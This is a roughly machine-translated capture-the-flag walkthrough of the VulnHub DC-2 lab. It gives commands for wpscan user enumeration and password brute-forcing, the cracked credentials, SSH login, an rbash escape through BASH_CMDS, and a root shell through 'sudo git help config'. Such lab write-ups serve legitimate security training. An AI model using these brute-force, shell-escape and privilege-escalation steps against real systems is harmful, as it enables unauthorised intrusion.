[vulnhub range] - DC2

1、 Environment configuration
kali：88.16.153.14
dc-2：88.16.153.6
To configure hosts file ：
linux：vi /etv/hosts

2、 information gathering
2.1 Open ports ：80、7744, And 7744 yes ssh service , It's usually 22 port , It's not normal

2.2 Browse the website , hear CMS yes wordpress5.9.3, And there is one flag1, The general meaning of the translation is w No, for my dictionary , Need to use cewl Collect passwords , And flag It may not be in the user directory

2.3 cewl http://dc-2/ -w w.txt, Collect password dictionary

2.4, because cms yes wordpress, But Baidu has its background Directory , The background directory of this website is http://dc-2/wp-login.php
3、 penetration
3.1 kali Tools exist in wpscan, yes wordpress Scan tool , Use this tool to scan user names
wpscan --url dc-2 -e u, Get three user names , Save in user.txt in ,

Use wpscan To crack violently , wpscan --url dc-2 -U user.txt -P w.txt, obtain jerry/adipiscing、tom/parturient

3.2 Log in to this website , Find out flag2, The tip is if I can't take advantage of wordpress Loophole , You can try other entry points

3.3, When collecting ports 7744 The port is on ssh port , Try to use the blasted user name and password ssh Sign in , Use jerry Login time , No authority to report an error , Use tom Successfully logged in

obtain flag3


according to flag3 Content judgment , Need to switch to jerry Under the user , Use su Switch , But no su This command , According to the error report, it should be rbash The escape , I don't really understand , Can own Baidu
BASH_CMDS[a]=/bin/sh ;
a # call /bin/sh command interpreter
/bin/bash # Use bash command interpreter
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin # Set the environment variable


Find the flag4, stay home/jerry Under the table of contents


According to the prompt is to use git Raise the right ,git Yes root jurisdiction

sudo git help config
!/bin/bash


Successfully found the last flag